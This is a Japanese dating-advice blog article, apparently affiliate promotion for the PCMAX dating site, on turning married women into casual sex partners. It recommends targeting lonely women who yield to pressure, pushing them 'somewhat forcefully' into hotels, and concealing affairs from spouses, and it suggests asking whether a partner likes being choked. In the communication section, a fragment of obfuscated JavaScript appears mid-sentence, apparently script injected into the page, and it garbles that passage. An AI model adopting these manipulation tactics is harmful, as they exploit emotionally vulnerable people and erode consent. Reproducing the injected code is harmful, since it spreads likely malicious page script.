人妻をセフレにしたい!具体的な6つのポイントと注意点を紹介

  • このエントリーをはてなブックマークに追加
  • Pocket

恋人が欲しいと思う男は多いですが、それと同じくらいセフレが欲しいと思う人も多いのではないでしょうか。

「彼女とのセックスに飽きた」「嫁をもう女として見れない」「とにかく可愛い子とセックスしたい」など色々な理由があるでしょう。セフレはセックスでつながる楽な関係であるため、彼氏彼女の関係がめんどうと思っている人にはピッタリです。

セフレを作るには人妻を狙うのがおすすめです。人妻はセックスに飢えていたり、愛情に飢えていたり、女として見られたい、など色々な人に言えない欲求を抱えています。

だから、エロくて積極的であったり、日常に不満を抱いている分、セフレならばOKという人妻が多いです。

では、人妻をセフレにするにはどうすればいいのでしょうか。このページでは人妻をセフレにするポイントなどを具体的にわかりやすく紹介していきます。ぜひ参考にしてみてください。

人妻がセフレになりやすい3つの理由とは

人妻がセフレになりやすい3つの理由
1.セックスレスで欲求不満な人妻が多い
2.旦那がかまってくれない
3.退屈な日常に刺激を求めている人妻が多い

人妻がセフレれになりやすいのは、大きく分けて3つの理由があります。

セフレになりやすい理由を知ることで、人妻の心理が理解できます。相手の心理が理解できれば、自然とアプローチの方向性も見えてくるのです。

例えば「旦那がかまってくれなくて寂しい」なら、女性扱いしてあげる、まめに連絡して寂しさを紛らわせてあげる、などです。

相手の心理や悩んでいること、欲していることを把握することはセフレ作りでは大切なんです。

1.セックスレスで欲求不満な人妻が多い

日本にはセックスレスで欲求不満な人妻が多いです。恋愛感情は3年でなくなると脳科学で言われています。それも影響して日本の約50%の夫婦はセックスであると言われています。

コンドームメーカーでおなじみの相模ゴム工業株式会社の調査では「結婚相手、交際相手と世間一般に言うセックスレスだと思いますか?」という質問に対して、既婚者の55.2%、交際中の29%の人が「セックスレスだと思う」と回答しています。

結婚生活をして常に一緒に過ごすようになると、ときめかなくなったり、イチャイチャする機会が減り、セックスレスになる夫婦は多いです。

そのため性欲が溜まっている人妻も多く、解消したいと思っています。そんなときに欲求を解消するためだけの、面倒くさくない相手であれば、セフレになってもいいと思う人妻は狙い目です。

新婚の場合はまだ子供がいないのでセックスレスではない夫婦も多いです。でもすでに子供もいたり、結婚して3年以上経っている人妻はセフレになりやすいです。

2.旦那がかまってくれない

人妻が欲求不満になるのは、「旦那がかまってくれないこと」が大きく関わっています。

結婚して一緒に暮らすようになると、お互いの存在が当たり前になり、褒めなくなったり、愛情表現がなくなってしまう夫婦は多いです。

また、ほとんどの家庭の旦那さんは平日は働いています。帰りは夜遅く、人妻は話したいのに「疲れている」の一言で相手にしてくれないこともあります。

しかし、女性なら会話したいし、もっと言うと毎日「かわいい」と言われたり、「愛している」という愛情表現が欲しい、と思っている人がほとんどです。

人妻はこの「愛情」に飢えているので、愛情表現をしっかりしてくれて、女性として特別扱いしてくれる男を欲しています。

特に30代の夫婦は、旦那さんは仕事で忙しく、女性は育児に疲れています。そのため、人妻は他の人と交流したくなる気持ちが強くなり、旦那以外とのセックスを求めやすくなります。

3.退屈な日常に刺激を求めている人妻が多い

退屈な日常に刺激を求めている人妻が多いのも、セフレになりやすい理由の1つです。

多くの女性は結婚すれば毎日が幸せであり、落ち着いた暮らしを得られると思っています。たしかに愛する夫がいて、子供に恵まれれば、安定と落ち着いた暮らしができることでしょう。

20代はそんな結婚に憧れますが、いざ結婚して30代、40代と年齢を重ねると、「退屈さ」を感じる瞬間が必ず訪れます。特に子供が小学生になって手がかからなくなり、ふと落ち着くと同時に「退屈さ」を感じます。

男は仕事で任されることが多くなり、ある程度の刺激がある日常を過ごすことができますが、人妻(特に専業主婦)は育児と家事に追われています。その育児が落ち着く頃に、退屈さを感じやすいんです。

退屈な毎日に新たな刺激を求めたり、出会いを欲するため、刺激的な新たな恋をしたくなってしまいます。このようなことからも人妻はセフレになりやすくおすすめです。

人妻と出会うためにおすすめの方法とは

次に人妻と出会うためには、どうすれば良いのかを紹介していきましょう。人妻でもセフレになりやすい人と、なりにくい人というのは確実にいます。

そのため、どのような方法で出会うのかは重要です。彼女を作りたいのに男友達とばかり遊んでいては、一生彼女ができないのと同じです。ここからは人妻と出会うためのおすすめの方法を紹介していくので、参考にしてみてください。

元々の知り合いをセフレにするのは危険

まず、やってしまいがちで良くないケースを紹介します。元々の知り合いの人妻をセフレにするのは、あまりおすすめしません。知り合いとは学生時代の同級生、学生時代のアルバイトの同僚、子供の親同士、ご近所さんなどです。

というのも相手の旦那さんにバレる可能性もあるからです。仮に人妻をセフレにしてバレれば「不倫」として訴えられたり、関係性が壊れるのは言うまでもありません。慰謝料を取られることもあり得ます。

また、現在はSNSなどですぐに噂は広がります。特に良くない噂は広がりやすいので。以前からの知り合いの場合だと、誰に偶然見られるかもわからないので、知られてしまうケースも考えられます。

こういったことから、もともとの知り合いをセフレにするのはおすすめしません。特に自分がセフレ相手の旦那さんとも仲がいい場合、大問題になる可能性が高いことからも、知り合いをセフレにするのは避けましょう。

セフレを作る上でのリスクについて詳しく書いた記事もあるので、ぜひ合わせて読んでください。事前にリスクを理解することで、対策できるので、よりセフレとのセックスを楽しめるようになります。

職場の人妻をセフレにするのは危険

職場の人妻をセフレにするのもおすすめしません。人妻とセフレであることがまわりにバレた場合、仕事に大きく影響を与えます。そのため、左遷はおろかクビになることも十分に考えられます。

仮に職場の中で人妻のセフレができたとしても、仕事中にちょっとしたボロが出て周りに感づかれる可能性もあります。職場内での噂は思っている以上に広まるのも早く、問題にもなりやすいです。

ほとんどの人は所属する会社から給料をもらっているので、もし突然クビになってしまったら生活に困るでしょう。そんなリスクを犯してまで会社の人妻を選ぶ必要はありません。

僕が最もおすすめするのは下で紹介する「出会い系サイト」です。職場の人妻をセフレするよりは圧倒的にリスクが少ないのが魅力的です。

人妻をセフレにするなら出会い系サイトがおすすめ

僕が最もおすすめする人妻と出会う方法は、出会い系サイトです。最近では簡単に登録できて、入会費もかからない出会い系サイトやマッチングアプリが多数あります。

旦那にバレるリスクが少ないと思っているので、人妻の出会い系サイトの登録者は多いです。

また、人妻かどうかもプロフィールですぐにわかるので探しやすく、暇なときにさくっと相手を見つけられるのでおすすめなです。

人妻が出会い系サイトに登録しているのは、今の旦那に不満を持っている、日常に退屈している、など自覚していない「悩み」が要因です。

セフレを探していたり、不倫関係を望んでいる可能性がかなり高いので、セフレ関係になりやすいと言えるでしょう。実際に街でナンパするよりも効率的なのでおすすめです。

僕がいつも人妻をセフレにする時に使っている出会い系サイトのリンクを下にはります。このPCMAX(R18)は出会い系サイトの中でも昔からあって、安心できるサイトです。また人妻もたくさん登録しているため、人妻をセフレにするならこのサイトがおすすめです。

PCMAXへ無料登録はこちら(R18)

人妻をセフレにするための6つのポイントとは

ここからは人妻をセフレにするためのポイントを紹介していきます。上での伝えましたが、人妻と出会うなら「出会い系サイト」がおすすめです。

だから、ここから先は出会い系サイトで人妻と出会うことを前提として説明していきます。人妻をセフレにするためのポイントを理解して、実践を積み重ねて下さい。

読むだけでは絶対にだめですよ。行動しない限りは絶対にセフレはできませんから。

1.セフレになりやすい人妻を狙う

冒頭でも紹介しましたが、人妻全員がセフレを求めているわけではありません。セフレを欲しているのか、セフレになりやすい人妻なのか、と見極めが大切です。

その人性格によって、セフレになりやすいかどうかは大きく変わってきます。そのため、まずは相手を分析するのです。

下がセフレになりやすい人妻の特徴です。

セフレになりやすい人妻の特徴
– 専業主婦
– 趣味がない
– 押しに弱い
– 出会い系サイト内で「友達」「飲み友」を探している
– プロフィールや日記に「寂しい」「退屈」「話したい」「暇している」など書いている
– 旦那とうまくいっていない
– 子供が一人暮らしを始めて旦那と2人で暮らしている

出会い系サイトには刺激を求めていたり、セフレを欲している人妻が登録しています。そもそも何も求めていない、幸せいっぱいの人妻は出会い系サイトやマッチングアプリを使いません。

だから出会い系サイトで出会う人妻はセフレにできる可能性が高いです。その上で、上記のような特徴を検索しましょう。さらにセフレGETの可能性が上がります。

特に見て欲しい特徴は「専業主婦」「旦那とうまくいっていない」「寂しがりや」です。専業主婦であればそれだけ1人でいる時間も多く、「人に会いたい」「しゃべりたい」と感じています。

また、寂しがりやであればあるほど、旦那にかまってもらえないときに甘い言葉をかけることで、あなたの虜になります。寂しくて退屈な人妻にとって甘えられる存在は大きいのです。

セフレになりやすい女の子の特徴について、より詳しく紹介している記事もあるので、合わせて読んでみてください。より理解が深まるのでおすすめです。

2.メッセージで打ち解けてから2人で会う約束をする

ほとんどの出会い系サイトは、お互いが「いいな」と思って何かしらのアクションをすることで連絡が取り合えるようになります。

いいなと思った女の子とつながっても、すぐに会おうしてはいけません。特にメッセージのやり取りを始めてすぐに、「会おう」と誘うのは絶対にNG。

人妻はセフレを作るとしても信頼できる相手であり、安全かどうか警戒して見ています。男にこの感覚はないので注意が必要です。女性は男の何倍も警戒心が強く、「ネット上で出会った人といきなりは会うのは怖い」と感じています。

Balloonの調査では20歳〜35歳の女の子の約83%がマッチングアプリで実際に会うのは怖いと回答しています。

そのため、最初はメッセージで相手と打ち解けるようにしましょう。セフレ関係になるとはいえ、人妻は体だけが目当ての男を嫌がることからも、少しの辛抱をすることが重要です。

下のメッセージの会話ネタを参考に、やり取りを続けてみて下さい。メッセージの内容に困ったら使って下さい。念の為メッセージの内容としてNGなネタも紹介するので、注意してください。

メッセージで打ち解ける時の会話ネタ
– 趣味の話
– 休みの過ごし方
– どんな仕事をしているのか
– 出身地の話
– 今住んでいるところ

メッセージでのNGネタ
– 下ネタ
– 重めの恋愛の話
– 相手が興味ないであろう報告(例:今日はパスタを食べたよ、今日は映画を見たよ…etc)
– 自慢話

3.とにかく相手の話を聞いて共感、褒めてあげる

人妻に限らず女性は、男が思っている以上に話すことが好きであり、自分の頭の中で解決するのが苦手です。そのため、誰かに話すことでスッキリして共感してもらうことに喜びを覚えます。

でも多くの人妻の旦那はゆっくり話を聞いてくれません。仕事で疲れて帰ってきて奥さんの話をゆっくり聞いてあげる心の広い男は少数はでしょう。このようなちょっとした擦れ違いがセックスレスの原因になり、夫婦間の問題を引き起こします。

dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todoke.pdf” target=”_blank” rel=”noopener noreferrer”>株式会社マクロミルによる夫婦に関する調査レポートでは、「十分コミュニケーションを取れている」と感じている人は56%と半分よりやや多い結果となっています。つまり半数弱の人は、夫婦間のコミュニケーションを十分に取れてないと感じているのです。

人妻のセフレにしたいなら、とにかく相手の話を聞いて、とにかく共感することが大切です。意見を言ったり正論をぶつけるのではなく、ちゃんと聞いてあげて「それは大変だね」「よく頑張ったね」など労いの言葉や共感する言葉をかけてあげる大事。

適度に相槌を打つことと、大変だったことを自分が理解していると、相手に理解してもらうだけで女性は満足して、心を開いてくれるようになります。

そうすることで一気に距離は縮まり、「旦那より良い男」と認識されセックスまで一歩前進です。一歩前進というか、これが最も大切と言っても過言ではありません。

4.女の子扱いしてあげる

ほとんどの人妻の旦那に女の子扱いされてません。上でも伝えましたが、女の子扱いどころか、コミュニケーションすら十分に取れてませんからね…。それは3組に1組は離婚しますよね…。

女性って、いくつになっても「可愛い女の子でいたい」って気持ちがなくならないんです。CMや電車の広告、Webの広告で、アンチエイジングとか、美肌とか、美魔女とかって言葉をよく聞きますよね。

何が言いたいかというと、人妻は再び自分が女の子扱いされて、「ときめきたい」と無意識に感じているんです。

だから少し過剰なくらいでも、会ったときや会話の節々に「女の子扱い」するよう気を付けることで、あなたに心を開くようになるでしょう。

例えば一緒に歩くときは歩幅を合わせたり、荷物を持ってあげる。外見やスタイル、服装などが似合っていて「かわいい」と褒めあげること。

もちろんセックスするときも、しっかりと気持ちが伝わるようにキレイと伝えたり、女の子扱いを心がけましょう。
「女の子扱い」の具体例
– 重い荷物は率先して持ってあげる
– 服装や髪型、ネイルなどの外見を褒めてあげる(実年齢より全然若く見える、が一番うれしいらしい)
– 変に年上だからと気を遣わず、同年代の女の子として接する
– さりげないボディタッチを頻繁にする
 - 手を繋ぐ
 - 頭をなでてあげる(よしよし)

5.ホテルか自宅に誘うときは多少強引にリードする

人妻をセフレにする場合、自分よりも年上であるが多いでしょう。でも最後のリードはあなたが責任を持ちましょう。

相手が年上だと、なんとなく相手に行き先や次に何をするかなど、任せてしまう人も多くいます。しかし、人妻と言えど1人の女性であり、自分からホテルや自宅に誘える人はほとんどいないです。

デートする際のエスコートや、ホテルに誘うのは男がリードするように心がけましょう。また、人妻も本心ではホテルに行きたいと思っていても、罪悪感を感じる場合もあります。

そこで少し強引なくらいにホテルに誘うことで、「しかたなく来てしまった」という言い訳や逃げ道を作ってあげましょう。「今日は帰りたくない」「◯◯さんとまだ一緒にいたい」など言われれば当然相手も嬉しくなり、あなたのことを無下にはできません。

年下なら年下なりの言い方や言葉遣いで、人妻をホテルか自宅に誘いましょう。ホテルや自宅への誘い方がわからない人は、下の記事も合わせて読んでみてください。新規の女の子をホテルか自宅に誘うための戦略を詳しく説明しています。

6.セックスで相手に喜んでもらえるよう徹する

人妻とセフレ関係になるためには、セックスで相手に喜んでもらう必要があります。自分本位だったり、相手が嫌がるようなセックスは当然NGです。もう会ってくれないでしょう。

その人妻に合った、その人妻が求めているセックスに徹することがおすすめです。ソフトに責められたい女性もいるし、反対に男を攻めて感じている顔に興奮する女性もいます。

それをセックスしている時に察知して、改善していくのです。相手に合わせて、相手の喜ぶセックスができるかどうかが大切。これがナチュラルにできれば、人妻はあなたの虜です。

セフレを欲している人妻はほとんど旦那とのセックスに満足していません。セックスで満足させてあげることができれば、「また会いたい」と思ってもらえます。

また、前戯と終わった後のピロートークも忘れてはいけません。男は射精したらセックスが終わりだと思っていますが、女の子は違います。後戯も含めてセックスです。

ピロートーク中に直接相手の願望を聞き出して、人妻の相手が喜ぶことを優先することで、大事にされていると思うので関係性もより良くなるでしょう。セフレになるからこそ、どちらも楽しくしたいと思えるようなセックスになるように心がける必要があります。

ピロートーク中に相手の好みのセックスを知るための質問例
– 今までで1番興奮したセックスはどんな感じ?
– ◯◯さんはS?それともM?
– 今後はちょっと変わったプレイがしたいな。どんなことしたい?
– ◯◯ちゃんはMだよね。ひょっとして首絞められるのとか好き?
– ◯◯ちゃんておれの要望めっちゃ聞いてくれるよね。相手の喜んでいる顔が好きなの?

人妻をセフレにする時の注意点とは

最後に人妻をセフレにする時の注意点とを紹介します。注意点を事前に知ることで失敗するリスクを減らせるうえに、長い間セフレ関係を続けられるようになります。

人妻をセフレにするのはリスクがあるからこそ、失敗しないように注意点をしっかりと覚え、守るように心がけましょう。

くれぐれも相手の旦那にバレないように配慮してあげる

相手の旦那にバレないように配慮することは、言うまでもなく大切です。人妻はセフレが欲しいと考えている人でも、結婚生活を続けた上で、バレない程度に遊びたいと思っています。

優先度が最も高いのは、「家庭」です。女性は安定思考が強いので、家庭という安定を手放したくはないのです。このことから、突然の電話やLINEはもちろんのこと、あなたの都合で呼び出すのはNGです。

もしバレてしまえば大問題となります。離婚になる可能性もありますし、離婚は免れたとしても夫婦関係にはヒビが入ります。また悪い噂はすぐに広がるので、世間体も悪くなります。

だからセフレがいる人妻が一番恐れるのは、旦那にバレることです。バレる可能性が大きくなれば罪悪感も増し、セックスに集中できなくなり、人妻とのエロいセックスを楽しめなくなります。

会う日や頻度、連絡する時間帯など、色々なことに配慮することで、人妻が安心してセフレ関係を継続できます。

干渉しすぎると人妻に嫌われる

人妻を干渉しすぎることもNGです。人妻は先ほども伝えたように家庭があり、一番大事なのは家族です。

そのため、セフレを作ったとしても距離感は大事にしていたいと思っています。お互いに深くは関わりすぎず、セフレとして距離感を縮めすぎないように心がけることも重要です。

何度も電話をしたり、会いたいと頻繁に言ったり、家を知ろうとすると、相手の人妻も危機感や不安を感じてしまいます。家に行きたいと言い出したり、旦那のことを聞き出すなどはやめましょう。

人妻は非日常を味わいたいと思っています。旦那にバレることなくその欲求を叶えるよう心がけることで、幸せなセフレ関係を築くことができるでしょう。

干渉しすぎないPOINT
セフレが1人しかいない場合、そのセフレを干渉してしまうことがあります。1人しかセフレがいないので、もし音信不通になったり、会えなくなった場合、セックスする相手がいないから焦るのです。僕が提案する解決策は、セフレを複数人作ることです。これは人妻に限らず。2、3人セフレがいれば、例え1人の人妻が会えなくなったとしても、別のセフレに連絡して会えばセックスできます。それで性欲は満たされるのです。

人妻をセフレにしてエロいセックスを楽しもう

今回は人妻がセフレになりやすい理由と、人妻をセフレにするポイント、注意点について紹介しました。ポイントは近い関係じゃない相手と出会い系サイトなどで出会うことです。

また、人妻の欲求をまずは満たすように行動することで、信頼関係を作って相手に好意を持ってもらい、長くセフレの関係性を続けられることができます。

人妻は相手がいて、旦那さんの目を盗んで関係を持っているからこその背徳感があります。しかし、実際にバレたときは裁判沙汰になることもあるので、あくまでバレないよう楽しんでください。

人妻も非日常を味わい、自分もエロい人妻のセフレを手に入れられる良好な関係を築くことが成功のポイントです。

人妻だからこそできるセックスや楽しみ方もあるので、ぜひ今回紹介した方法を試してエロくて美人な人妻をセフレにしてください。陰ながら応援しています。

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。